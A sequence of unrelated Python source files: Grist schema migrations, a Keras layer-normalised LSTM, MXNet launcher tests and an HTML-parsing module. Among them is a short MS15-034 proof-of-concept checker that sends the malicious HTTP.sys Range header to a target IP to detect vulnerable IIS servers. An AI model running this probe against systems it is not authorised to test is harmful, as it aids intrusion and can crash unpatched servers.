There is no longer a "Derived" type for columns, and summary tables use the type suitable for
the column being summarized. For old documents, convert "Derived" type to "Any", and adjust the
usage of "lookupOrAddDerived()" function.
"""
# Note that this is a complicated migration, and mainly acceptable because it is before our very
# first release. For a released product, a change like this should be done in a backwards
# compatible way: keep but deprecate 'Derived'; introduce a lookupOrAddDerived2() to use for new
# summary tables, but keep the old interface as well for existing ones. The reason is that such
# migrations are error-prone and may mess up customers' data.
doc_actions = []
tables = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables']))
tables_map = {t.id: t for t in tables}
columns = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables_column']))
# Convert columns from type 'Derived' to type 'Any'
affected_cols = [c for c in columns if c.type == 'Derived']
if affected_cols:
doc_actions.extend(
actions.ModifyColumn(tables_map[c.parentId].tableId, c.colId, {'type': 'Any'})
for c in affected_cols
)
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables_column',
[c.id for c in affected_cols],
{'type': ['Any' for c in affected_cols]}
))
# Convert formulas of the form '.lookupOrAddDerived($x,$y)' to '.lookupOrAddDerived(x=$x,y=$y)'
formula_re = re.compile(r'(\w+).lookupOrAddDerived\((.*?)\)')
arg_re = re.compile(r'^\$(\w+)$')
def replace(match):
args = ", ".join(arg_re.sub(r'\1=$\1', arg.strip()) for arg in match.group(2).split(","))
return '%s.lookupOrAddDerived(%s)' % (match.group(1), args)
formula_updates = []
for c in columns:
new_formula = c.formula and formula_re.sub(replace, c.formula)
if new_formula != c.formula:
formula_updates.append((c, new_formula))
if formula_updates:
doc_actions.extend(
actions.ModifyColumn(tables_map[c.parentId].tableId, c.colId, {'formula': f})
for c, f in formula_updates
)
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables_column',
[c.id for c, f in formula_updates],
{'formula': [f for c, f in formula_updates]}
))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=4)
def migration4(tdset):
"""
Add TabPos column to TabBar table
"""
doc_actions = []
row_ids = tdset.all_tables['_grist_TabBar'].row_ids
doc_actions.append(add_column('_grist_TabBar', 'tabPos', 'PositionNumber'))
doc_actions.append(actions.BulkUpdateRecord('_grist_TabBar', row_ids, {'tabPos': row_ids}))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=5)
def migration5(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Views', 'primaryViewTable', 'Ref:_grist_Tables',
formula='_grist_Tables.lookupOne(primaryViewId=$id)', isFormula=True),
])
@migration(schema_version=6)
def migration6(tdset):
# This undoes the previous migration, since primaryViewTable is now a formula private to the
# sandbox rather than part of the document schema.
return tdset.apply_doc_actions([
actions.RemoveColumn('_grist_Views', 'primaryViewTable'),
])
@migration(schema_version=7)
def migration7(tdset):
"""
Add summarySourceTable/summarySourceCol fields to metadata, and adjust existing summary tables
to correspond to the new style.
"""
# Note: this migration has some faults.
# - It doesn't delete viewSectionFields for columns it removes (if a user added some special
# columns manually.
# - It doesn't fix types of Reference columns that refer to old-style summary tables
# (if the user created some such columns manually).
doc_actions = [action for action in [
maybe_add_column(tdset, '_grist_Tables', 'summarySourceTable', 'Ref:_grist_Tables'),
maybe_add_column(tdset, '_grist_Tables_column', 'summarySourceCol', 'Ref:_grist_Tables_column')
] if action]
# Maps tableRef to Table object.
tables_map = {t.id: t for t in actions.transpose_bulk_action(tdset.all_tables['_grist_Tables'])}
# Maps tableName to tableRef
table_name_to_ref = {t.tableId: t.id for t in six.itervalues(tables_map)}
# List of Column objects
columns = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables_column']))
# Maps columnRef to Column object.
columns_map_by_ref = {c.id: c for c in columns}
# Maps (tableRef, colName) to Column object.
columns_map_by_table_colid = {(c.parentId, c.colId): c for c in columns}
# Set of all tableNames.
table_name_set = set(table_name_to_ref.keys())
remove_cols = [] # List of columns to remove
formula_updates = [] # List of (column, new_table_name, new_formula) pairs
table_renames = [] # List of (table, new_name) pairs
source_tables = [] # List of (table, summarySourceTable) pairs
source_cols = [] # List of (column, summarySourceColumn) pairs
# Summary tables used to be named as "Summary_<SourceName>_<ColRef1>_<ColRef2>". This regular
# expression parses that.
summary_re = re.compile(r'^Summary_(\w+?)((?:_\d+)*)$')
for t in six.itervalues(tables_map):
m = summary_re.match(t.tableId)
if not m or m.group(1) not in table_name_to_ref:
continue
# We have a valid summary table.
source_table_name = m.group(1)
source_table_ref = table_name_to_ref[source_table_name]
groupby_colrefs = [int(x) for x in m.group(2).strip("_").split("_")]
# Prepare a new-style name for the summary table. Be sure not to conflict with existing tables
# or with each other (i.e. don't rename multiple tables to the same name).
new_name = summary.encode_summary_table_name(source_table_name)
new_name = identifiers.pick_table_ident(new_name, avoid=table_name_set)
table_name_set.add(new_name)
log.warn("Upgrading summary table %s for %s(%s) to %s" % (
t.tableId, source_table_name, groupby_colrefs, new_name))
# Remove the "lookupOrAddDerived" column from the source table (which is named using the
# summary table name for its colId).
remove_cols.extend(c for c in columns
if c.parentId == source_table_ref and c.colId == t.tableId)
# Upgrade the "group" formula in the summary table.
expected_group_formula = "%s.lookupRecords(%s=$id)" % (source_table_name, t.tableId)
new_formula = "table.getSummarySourceGroup(rec)"
formula_updates.extend((c, new_name, new_formula) for c in columns
if (c.parentId == t.id and c.colId == "group" and
c.formula == expected_group_formula))
# Schedule a rename of the summary table.
table_renames.append((t, new_name))
# Set summarySourceTable fields on the metadata.
source_tables.append((t, source_table_ref))
# Set summarySourceCol fields in the metadata. We need to find the right summary column.
groupby_cols = set()
for col_ref in groupby_colrefs:
src_col = columns_map_by_ref.get(col_ref)
sum_col = columns_map_by_table_colid.get((t.id, src_col.colId)) if src_col else None
if sum_col:
groupby_cols.add(sum_col)
source_cols.append((sum_col, src_col.id))
else:
log.warn("Upgrading summary table %s: couldn't find column %s" % (t.tableId, col_ref))
# Finally, we have to remove all non-formula columns that are not groupby-columns (e.g.
# 'manualSort'), because the new approach assumes ALL non-formula columns are for groupby.
remove_cols.extend(c for c in columns
if c.parentId == t.id and c not in groupby_cols and not c.isFormula)
# Create all the doc actions from the arrays we prepared.
# Process remove_cols
doc_actions.extend(
actions.RemoveColumn(tables_map[c.parentId].tableId, c.colId) for c in remove_cols)
doc_actions.append(actions.BulkRemoveRecord(
'_grist_Tables_column', [c.id for c in remove_cols]))
# Process table_renames
doc_actions.extend(
actions.RenameTable(t.tableId, new) for (t, new) in table_renames)
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables', [t.id for t, new in table_renames],
{'tableId': [new for t, new in table_renames]}
))
# Process source_tables and source_cols
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables', [t.id for t, ref in source_tables],
{'summarySourceTable': [ref for t, ref in source_tables]}
))
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables_column', [t.id for t, ref in source_cols],
{'summarySourceCol': [ref for t, ref in source_cols]}
))
# Process formula_updates. Do this last since recalculation of these may cause new records added
# to summary tables, so we should have all the tables correctly set up by this time.
doc_actions.extend(
actions.ModifyColumn(table_id, c.colId, {'formula': f})
for c, table_id, f in formula_updates)
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables_column', [c.id for c, t, f in formula_updates],
{'formula': [f for c, t, f in formula_updates]}
))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=8)
def migration8(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Tables_column', 'untieColIdFromLabel', 'Bool'),
])
@migration(schema_version=9)
def migration9(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Tables_column', 'displayCol', 'Ref:_grist_Tables_column'),
add_column('_grist_Views_section_field', 'displayCol', 'Ref:_grist_Tables_column'),
])
@migration(schema_version=10)
def migration10(tdset):
"""
Add displayCol to all reference cols, with formula $<ref_col_id>.<visible_col_id>
(Note that displayCol field was added in the previous migration.)
"""
doc_actions = []
tables = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables']))
columns = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables_column']))
# Maps tableRef to tableId.
tables_map = {t.id: t.tableId for t in tables}
# Maps tableRef to sets of colIds in the tables. Used to prevent repeated colIds.
table_col_ids = {t.id: set(tdset.all_tables[t.tableId].columns.keys()) for t in tables}
# Get the next sequential column row id.
row_id = next_id(tdset, '_grist_Tables_column')
for c in columns:
# If a column is a reference with an unset display column, add a display column.
if c.type.startswith('Ref:') and not c.displayCol:
# Get visible_col_id. If not found, row id is used and no display col is necessary.
visible_col_id = ""
try:
visible_col_id = json.loads(c.widgetOptions).get('visibleCol')
if not visible_col_id:
continue
except Exception:
continue # If invalid widgetOptions, skip this column.
# Set formula to use the current visibleCol in widgetOptions.
formula = ("$%s.%s" % (c.colId, visible_col_id))
# Get a unique colId for the display column, and add it to the set of used ids.
used_col_ids = table_col_ids[c.parentId]
display_col_id = identifiers.pick_col_ident('gristHelper_Display', avoid=used_col_ids)
used_col_ids.add(display_col_id)
# Add all actions to the list.
doc_actions.append(add_column(tables_map[c.parentId], 'gristHelper_Display', 'Any',
formula=formula, isFormula=True))
doc_actions.append(actions.AddRecord('_grist_Tables_column', row_id, {
'parentPos': 1.0,
'label': 'gristHelper_Display',
'isFormula': True,
'parentId': c.parentId,
'colId': 'gristHelper_Display',
'formula': formula,
'widgetOptions': '',
'type': 'Any'
}))
doc_actions.append(actions.UpdateRecord('_grist_Tables_column', c.id, {'displayCol': row_id}))
# Increment row id to the next unused.
row_id += 1
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=11)
def migration11(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Views_section', 'embedId', 'Text'),
])
@migration(schema_version=12)
def migration12(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Views_section', 'options', 'Text')
])
@migration(schema_version=13)
def migration13(tdset):
# Adds a basketId to the entire document to take advantage of basket functionality.
# From this version on, embedId is deprecated.
return tdset.apply_doc_actions([
add_column('_grist_DocInfo', 'basketId', 'Text')
])
@migration(schema_version=14)
def migration14(tdset):
# Create the ACL table AND also the default ACL groups, default resource, and the default rule.
# These match the actions applied to new document by 'InitNewDoc' useraction (as of v14).
return tdset.apply_doc_actions([
actions.AddTable('_grist_ACLMemberships', [
schema.make_column('parent', 'Ref:_grist_ACLPrincipals'),
schema.make_column('child', 'Ref:_grist_ACLPrincipals'),
]),
actions.AddTable('_grist_ACLPrincipals', [
schema.make_column('userName', 'Text'),
schema.make_column('groupName', 'Text'),
schema.make_column('userEmail', 'Text'),
schema.make_column('instanceId', 'Text'),
schema.make_column('type', 'Text'),
]),
actions.AddTable('_grist_ACLResources', [
schema.make_column('colIds', 'Text'),
schema.make_column('tableId', 'Text'),
]),
actions.AddTable('_grist_ACLRules', [
schema.make_column('aclFormula', 'Text'),
schema.make_column('principals', 'Text'),
schema.make_column('resource', 'Ref:_grist_ACLResources'),
schema.make_column('aclColumn', 'Ref:_grist_Tables_column'),
schema.make_column('permissions', 'Int'),
]),
# Set up initial ACL data.
actions.BulkAddRecord('_grist_ACLPrincipals', [1,2,3,4], {
'type': ['group', 'group', 'group', 'group'],
'groupName': ['Owners', 'Admins', 'Editors', 'Viewers'],
}),
actions.AddRecord('_grist_ACLResources', 1, {
'tableId': '', 'colIds': ''
}),
actions.AddRecord('_grist_ACLRules', 1, {
'resource': 1, 'permissions': 0x3F, 'principals': '[1]'
}),
])
@migration(schema_version=15)
def migration15(tdset):
# Adds a filter JSON property to each field.
# From this version on, filterSpec in _grist_Views_section is deprecated.
doc_actions = [
add_column('_grist_Views_section_field', 'filter', 'Text')
]
# Get all section and field data to move section filter data to the fields
sections = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Views_section']))
fields = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Views_section_field']))
specs = {s.id: safe_parse(s.filterSpec) for s in sections}
# Move filter data from sections to fields
for f in fields:
# If the field belongs to the section and the field's colRef is in its filterSpec,
# pull the filter setting from the section.
filter_spec = specs.get(f.parentId)
if filter_spec and str(f.colRef) in filter_spec:
doc_actions.append(actions.UpdateRecord('_grist_Views_section_field', f.id, {
'filter': json.dumps(filter_spec[str(f.colRef)])
}))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=16)
def migration16(tdset):
# Add visibleCol to columns and view fields, and set it from columns' and fields' widgetOptions.
doc_actions = [
add_column('_grist_Tables_column', 'visibleCol', 'Ref:_grist_Tables_column'),
add_column('_grist_Views_section_field', 'visibleCol', 'Ref:_grist_Tables_column'),
]
# Maps tableId to table, for looking up target table as listed in "Ref:*" types.
tables = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables']))
tables_by_id = {t.tableId: t for t in tables}
# Allow looking up columns by ref or by (tableRef, colId)
columns = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables_column']))
columns_by_ref = {c.id: c for c in columns}
columns_by_id = {(c.parentId, c.colId): c.id for c in columns}
# Helper which returns the {'visibleCol', 'widgetOptions'} update visibleCol should be set.
def convert_visible_col(col, widget_options):
if not col.type.startswith('Ref:'):
return None
# To set visibleCol, we need to know the target table. Skip if we can't find it.
target_table = tables_by_id.get(col.type[len('Ref:'):])
if not target_table:
return None
try:
parsed_options = json.loads(widget_options)
except Exception:
return None # If invalid widgetOptions, skip this column.
visible_col_id = parsed_options.pop('visibleCol', None)
if not visible_col_id:
return None
# Find visible_col_id as the column name in the appropriate table.
target_col_ref = (0 if visible_col_id == 'id' else
columns_by_id.get((target_table.id, visible_col_id), None))
if target_col_ref is None:
return None
# Use compact separators without whitespace, to match how JS encodes JSON.
return {'visibleCol': target_col_ref,
'widgetOptions': json.dumps(parsed_options, separators=(',', ':')) }
for c in columns:
new_values = convert_visible_col(c, c.widgetOptions)
if new_values:
doc_actions.append(actions.UpdateRecord('_grist_Tables_column', c.id, new_values))
fields = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Views_section_field']))
for f in fields:
c = columns_by_ref.get(f.colRef)
if c:
new_values = convert_visible_col(c, f.widgetOptions)
if new_values:
doc_actions.append(actions.UpdateRecord('_grist_Views_section_field', f.id, new_values))
return tdset.apply_doc_actions(doc_actions)
# This is actually the only migration that requires all tables because it modifies user data
# (specifically, any columns of the deprecated "Image" type).
@migration(schema_version=17, need_all_tables=True)
def migration17(tdset):
"""
There is no longer an "Image" type for columns, as "Attachments" now serves as a
display type for arbitrary files including images. Convert "Image" columns to "Attachments"
columns.
"""
doc_actions = []
tables = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables']))
tables_map = {t.id: t for t in tables}
columns = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables_column']))
# Convert columns from type 'Image' to type 'Attachments'
affected_cols = [c for c in columns if c.type == 'Image']
conv = lambda val: [val] if isinstance(val, int) and val > 0 else []
if affected_cols:
# Update the types in the data tables
doc_actions.extend(
actions.ModifyColumn(tables_map[c.parentId].tableId, c.colId, {'type': 'Attachments'})
for c in affected_cols
)
# Update the values to lists
for c in affected_cols:
if c.isFormula:
# Formula columns don't have data stored in DB, should not have data changes.
continue
table_id = tables_map[c.parentId].tableId
table = tdset.all_tables[table_id]
doc_actions.append(
actions.BulkUpdateRecord(table_id, table.row_ids,
{c.colId: [conv(val) for val in table.columns[c.colId]]})
)
# Update the types in the metadata tables
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables_column',
[c.id for c in affected_cols],
{'type': ['Attachments' for c in affected_cols]}
))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=18)
def migration18(tdset):
return tdset.apply_doc_actions([
add_column('_grist_DocInfo', 'timezone', 'Text'),
# all documents prior to this migration have been created in New York
actions.UpdateRecord('_grist_DocInfo', 1, {'timezone': 'America/New_York'})
])
@migration(schema_version=19)
def migration19(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Tables', 'onDemand', 'Bool'),
])
@migration(schema_version=20)
def migration20(tdset):
"""
Add _grist_Pages table and populate based on existing TableViews entries, ie: tables are sorted
alphabetically by their `tableId` and views are gathered within their corresponding table and
sorted by their id.
"""
tables = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables']))
table_map = {t.id: t for t in tables}
table_views = list(actions.transpose_bulk_action(tdset.all_tables['_grist_TableViews']))
# Old docs may include "Other views", not associated with any table. Don't include those in
# table_views_map: they'll get included but not sorted or grouped by tableId.
table_views_map = {tv.viewRef: table_map[tv.tableRef].tableId
for tv in table_views if tv.tableRef in table_map}
views = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Views']))
def view_key(view):
"""
Returns ("Table1", 2) where "Table1" is the view's tableId and 2 the view id. For
primary view (ie: not referenced in _grist_TableViews) returns ("Table1", -1). Useful
to get the list of views sorted in the same way as in the Table side pane. We use -1
for primary view to make sure they come first among all the views of the same table.
"""
if view.id in table_views_map:
return (table_views_map[view.id], view.id)
# the name of primary view's is the same as the tableId
return (view.name, -1)
views.sort(key=view_key)
row_ids = list(xrange(1, len(views) + 1))
return tdset.apply_doc_actions([
actions.AddTable('_grist_Pages', [
schema.make_column('viewRef', 'Ref:_grist_Views'),
schema.make_column('pagePos', 'PositionNumber'),
schema.make_column('indentation', 'Int'),
]),
actions.ReplaceTableData('_grist_Pages', row_ids, {
'viewRef': [v.id for v in views],
'pagePos': row_ids,
'indentation': [1 if v.id in table_views_map else 0 for v in views]
})
])
@migration(schema_version=21)
def migration21(tdset):
return tdset.apply_doc_actions([
add_column('_grist_ACLRules', 'aclFormulaParsed', 'Text'),
add_column('_grist_ACLRules', 'permissionsText', 'Text'),
add_column('_grist_ACLRules', 'rulePos', 'PositionNumber'),
add_column('_grist_ACLRules', 'userAttributes', 'Text'),
])
@migration(schema_version=22)
def migration22(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Tables_column', 'recalcWhen', 'Int'),
add_column('_grist_Tables_column', 'recalcDeps', 'RefList:_grist_Tables_column'),
])
@migration(schema_version=23)
def migration23(tdset):
return tdset.apply_doc_actions([
add_column('_grist_DocInfo', 'documentSettings', 'Text'),
actions.UpdateRecord('_grist_DocInfo', 1, {'documentSettings': '{"locale":"en-US"}'})
])
@migration(schema_version=24)
def migration24(tdset):
return tdset.apply_doc_actions([
actions.AddTable('_grist_Triggers', [
schema.make_column("tableRef", "Ref:_grist_Tables"),
schema.make_column("eventTypes", "ChoiceList"),
schema.make_column("isReadyColRef", "Ref:_grist_Tables_column"),
schema.make_column("actions", "Text"), # JSON
]),
])
|
middileware/iis/ms15_034.py
|
xin053/PocCollect
| 340 |
79132
|
<filename>middileware/iis/ms15_034.py<gh_stars>100-1000
#!/usr/bin/env python
# encoding: utf-8
from t import T
import re
import urllib2,requests,urllib2,json,urlparse
class P(T):
def __init__(self):
T.__init__(self)
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
timeout=3
if int(port) == 443:
protocal = "https"
else:
protocal = "http"
target_url = protocal + "://"+ip+":"+str(port)
result = {}
result['result']=False
r=None
vuln_header = {"Range": "bytes=0-18446744073709551615"}
try:
r=requests.get(url=target_url,headers=vuln_header,timeout=timeout,verify=False,allow_redirects=False)
#print r.content
if "请求范围不符合" in r.content or "Requested Range Not Satisfiable" in r.content:
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='iis Vulnerability'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload']=vuln_buffer
result['VerifyInfo']['result'] =r.content
except Exception,e:
print e.text
finally:
if r is not None:
r.close()
del r
return result
if __name__ == '__main__':
print P().verify(ip='192.168.127.12',port='443')
|
rhn/lstm_ln.py
|
Neovairis/deep-models
| 155 |
79146
|
from keras import backend as K
from keras.layers import LSTM, time_distributed_dense
from keras import initializations, activations, regularizers
from keras.engine import InputSpec
# LSTM with Layer Normalization as described in:
# https://arxiv.org/pdf/1607.06450v1.pdf
# page 13, equation (20), (21), and (22)
class LSTM_LN(LSTM):
def __init__(self, output_dim, **kwargs):
super(LSTM_LN, self).__init__(output_dim, **kwargs)
def norm(self, xs, norm_id):
mu = K.mean(xs, axis=-1, keepdims=True)
sigma = K.sqrt(K.var(xs, axis=-1, keepdims=True) + 1e-3)
xs = self.gs[norm_id] * (xs - mu) / (sigma + 1e-3) + self.bs[norm_id]
return xs
def build(self, input_shape):
super(LSTM_LN, self).build(input_shape)
self.gs, self.bs = [], []
for i in xrange(3):
f = 1 if i == 2 else 4
self.gs += [ K.ones((f*self.output_dim,), name='{}_g%i'.format(self.name, i)) ]
self.bs += [ K.zeros((f*self.output_dim,), name='{}_b%d'.format(self.name, i)) ]
self.trainable_weights += self.gs + self.bs
def step(self, x, states):
h_tm1 = states[0]
c_tm1 = states[1]
B_U = states[2]
B_W = states[3]
if self.consume_less == 'gpu':
z = self.norm(K.dot(x * B_W[0], self.W), 0) + self.norm(K.dot(h_tm1 * B_U[0], self.U), 1) + self.b
z0 = z[:, :self.output_dim]
z1 = z[:, self.output_dim: 2 * self.output_dim]
z2 = z[:, 2 * self.output_dim: 3 * self.output_dim]
z3 = z[:, 3 * self.output_dim:]
i = self.inner_activation(z0)
f = self.inner_activation(z1)
c = f * c_tm1 + i * self.activation(z2)
o = self.inner_activation(z3)
else:
assert (False)
if self.consume_less == 'cpu':
x_i = x[:, :self.output_dim]
x_f = x[:, self.output_dim: 2 * self.output_dim]
x_c = x[:, 2 * self.output_dim: 3 * self.output_dim]
x_o = x[:, 3 * self.output_dim:]
elif self.consume_less == 'mem':
x_i = K.dot(x * B_W[0], self.W_i) + self.b_i
x_f = K.dot(x * B_W[1], self.W_f) + self.b_f
x_c = K.dot(x * B_W[2], self.W_c) + self.b_c
x_o = K.dot(x * B_W[3], self.W_o) + self.b_o
else:
raise Exception('Unknown `consume_less` mode.')
i = self.inner_activation(x_i + K.dot(h_tm1 * B_U[0], self.U_i))
f = self.inner_activation(x_f + K.dot(h_tm1 * B_U[1], self.U_f))
c = f * c_tm1 + i * self.activation(x_c + K.dot(h_tm1 * B_U[2], self.U_c))
o = self.inner_activation(x_o + K.dot(h_tm1 * B_U[3], self.U_o))
h = o * self.activation(self.norm(c, 2))
return h, [h, c]
|
tools/accuracy_checker/tests/test_mxnet_launcher.py
|
APrigarina/open_model_zoo
| 1,031 |
79149
|
<gh_stars>1000+
"""
Copyright (c) 2018-2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest
pytest.importorskip('mxnet')
import cv2
import numpy as np
from accuracy_checker.launcher.launcher import create_launcher
from accuracy_checker.config import ConfigError
from accuracy_checker.data_readers import DataRepresentation
def get_mx_test_model(models_dir, config_override=None):
config = {
"framework": 'mxnet',
"model": models_dir / 'samplenet-0000.params',
"adapter": 'classification',
"device": 'cpu',
'inputs': [{'name': 'data', 'type': 'INPUT', 'shape': '3,32,32'}]
}
if config_override:
config.update(config_override)
return create_launcher(config)
class TestMxNetLauncher:
def test_launcher_creates(self, models_dir):
launcher = get_mx_test_model(models_dir)
assert launcher.inputs['data'] == (1, 3, 32, 32)
assert launcher.output_blob == 'fc3'
def test_infer(self, data_dir, models_dir):
mx_test_model = get_mx_test_model(models_dir)
_, _, h, w = mx_test_model.inputs['data']
img_raw = cv2.imread(str(data_dir / '1.jpg'))
img_rgb = cv2.cvtColor(img_raw, cv2.COLOR_BGR2RGB)
img_resized = cv2.resize(img_rgb, (w, h))
input_blob = np.transpose([img_resized], (0, 3, 1, 2))
res = mx_test_model.predict([{'data': input_blob.astype(np.float32)}], [{}])
assert np.argmax(res[0]['fc3']) == 7
def test_mxnet_launcher_provide_input_shape_to_adapter(self, mocker, models_dir):
mocker.patch('mxnet.mod.Module.forward', return_value={'fc3': 0})
launcher = get_mx_test_model(models_dir)
zeros = DataRepresentation(np.zeros((1, 3, 32, 32)))
launcher.predict([{'data': zeros.data}], [zeros.metadata])
assert zeros.metadata['input_shape'] == {'data': (1, 3, 32, 32)}
def test_mxnet_launcher_auto_model_search(self, models_dir):
launcher = get_mx_test_model(models_dir, {'model': models_dir})
assert launcher.model == models_dir / 'samplenet-0000.params'
@pytest.mark.usefixtures('mock_path_exists')
class TestMxNetLauncherConfig:
def test_missed_model_in_create_mxnet_launcher_raises_config_error_exception(self):
config = {'framework': 'mxnet'}
with pytest.raises(ConfigError):
create_launcher(config)
def test_missed_inputs_in_create_mxnet_launcher_raises_config_error_exception(self):
config = {'framework': 'mxnet', 'model': 'model-0000.params'}
with pytest.raises(ConfigError):
create_launcher(config)
def test_missed_shape_in_inputs_in_create_mxnet_launcher_raises_config_error_exception(self):
config = {'framework': 'mxnet', 'model': 'model-0000.params', 'inputs': [{'name': 'data', 'type': 'INPUT'}]}
with pytest.raises(ConfigError):
create_launcher(config)
|
scripts/mw2html_audacity/htmldata.py
|
joshrose/audacity
| 7,892 |
79150
|
<filename>scripts/mw2html_audacity/htmldata.py
"""
Manipulate HTML or XHTML documents.
Version 1.1.1. This source code has been placed in the
public domain by <NAME>.
Features:
- Translate HTML back and forth to data structures.
This allows you to read and write HTML documents
programmably, with much flexibility.
- Extract and modify URLs in an HTML document.
- Compatible with Python 3+
See the L{examples} for a quick start.
Moved to Python3 by <NAME> May 2020
"""
__version__ = '1.1.2'
__all__ = ['examples', 'tagextract', 'tagjoin', 'urlextract',
'urljoin', 'URLMatch']
# -------------------------------------------------------------------
# Globals
# -------------------------------------------------------------------
import re
import shlex
import string
import urllib.request, urllib.parse, urllib.error
import urllib.parse
import types
# Translate text between these strings as plain text (not HTML).
_IGNORE_TAGS = [('script', '/script'),
('style', '/style')]
# Special tags where we have to look for _END_X as part of the
# HTML/XHTML parsing rules.
_BEGIN_COMMENT = '<!--'
_END_COMMENT = '-->'
_BEGIN_CDATA = '<![CDATA['
_END_CDATA = ']]>'
# Mime types that can be parsed as HTML or HTML-like.
_HTML_MIMETYPES = ['text/html', 'application/xhtml',
'application/xhtml+xml', 'text/xml',
'application/xml']
# Mime types that can be parsed as CSS.
_CSS_MIMETYPES = ['text/css']
# -------------------------------------------------------------------
# HTML <-> Data structure
# -------------------------------------------------------------------
def tagextract(doc):
"""
Convert HTML to data structure.
Returns a list. HTML tags become C{(name, keyword_dict)} tuples
within the list, while plain text becomes strings within the
list. All tag names are lowercased and stripped of whitespace.
Tags which end with forward slashes have a single forward slash
placed at the end of their name, to indicate that they are XML
unclosed tags.
Example:
>>> tagextract('<img src=hi.gif alt="hi">foo<br><br/></body>')
[('img', {'src': 'hi.gif', 'alt': 'hi'}), 'foo',
('br', {}), ('br/', {}), ('/body', {})]
Text between C{'<script>'} and C{'<style>'} is rendered directly to
plain text. This prevents rogue C{'<'} or C{'>'} characters from
interfering with parsing.
>>> tagextract('<script type="a"><blah>var x; </script>')
[('script', {'type': 'a'}), '<blah>var x; ', ('/script', {})]
Comment strings and XML directives are rendered as a single long
tag with no attributes. The case of the tag "name" is not changed:
>>> tagextract('<!-- blah -->')
[('!-- blah --', {})]
>>> tagextract('<?xml version="1.0" encoding="utf-8" ?>')
[('?xml version="1.0" encoding="utf-8" ?', {})]
>>> tagextract('<!DOCTYPE html PUBLIC etc...>')
[('!DOCTYPE html PUBLIC etc...', {})]
Greater-than and less-than characters occurring inside comments or
CDATA blocks are correctly kept as part of the block:
>>> tagextract('<!-- <><><><>>..> -->')
[('!-- <><><><>>..> --', {})]
>>> tagextract('<!CDATA[[><>><>]<> ]]>')
[('!CDATA[[><>><>]<> ]]', {})]
Note that if one modifies these tags, it is important to retain the
C{"--"} (for comments) or C{"]]"} (for C{CDATA}) at the end of the
tag name, so that output from L{tagjoin} will be correct HTML/XHTML.
"""
L = _full_tag_extract(doc)
for i in range(len(L)):
if isinstance(L[i], _TextTag):
# _TextTag object.
L[i] = L[i].text
else:
# _HTMLTag object.
L[i] = (L[i].name, L[i].attrs)
return L
def _is_str(s):
"""
True iff s is a string (checks via duck typing).
"""
return hasattr(s, 'capitalize')
def tagjoin(L):
"""
Convert data structure back to HTML.
This reverses the L{tagextract} function.
More precisely, if an HTML string is turned into a data structure,
then back into HTML, the resulting string will be functionally
equivalent to the original HTML.
>>> tagjoin(tagextract(s))
(string that is functionally equivalent to s)
Three changes are made to the HTML by L{tagjoin}: tags are
lowercased, C{key=value} pairs are sorted, and values are placed in
double-quotes.
"""
if _is_str(L):
raise ValueError('got string arg, expected non-string iterable')
ans = []
for item in L:
# Check for string using duck typing.
if _is_str(item):
# Handle plain text.
ans.append(item)
elif item[0] == '--':
# Handle closing comment.
ans.append('-->')
elif item[0] == '!--':
# Handle opening comment.
ans.append('<!--')
else:
# Handle regular HTML tag.
(name, d) = item
if name[-1:] == '/':
rslash = ' /'
name = name[:-1]
else:
rslash = ''
tag_items = []
items = list(d.items())
items.sort()
for (key, value) in items:
if value != None:
if '"' in value and "'" in value:
raise ValueError('attribute value contains both single' +
' and double quotes')
elif '"' in value:
tag_items.append(key + "='" + value + "'")
else:
tag_items.append(key + '="' + value + '"')
else:
tag_items.append(key)
tag_items = ' '.join(tag_items)
if tag_items != '':
tag_items = ' ' + tag_items
ans.append('<' + name + tag_items + rslash + '>')
return ''.join(ans)
def _enumerate(L):
"""
Like C{enumerate}, provided for compatibility with Python < 2.3.
Returns a list instead of an iterator.
"""
return list(zip(list(range(len(L))), L))
def _ignore_tag_index(s, i):
"""
Helper routine: Find index within C{_IGNORE_TAGS}, or C{-1}.
If C{s[i:]} begins with an opening tag from C{_IGNORE_TAGS}, return
the index. Otherwise, return C{-1}.
"""
for (j, (a, b)) in _enumerate(_IGNORE_TAGS):
if s[i:i + len(a) + 1].lower() == '<' + a:
return j
return - 1
def _html_split(s):
"""
Helper routine: Split string into a list of tags and non-tags.
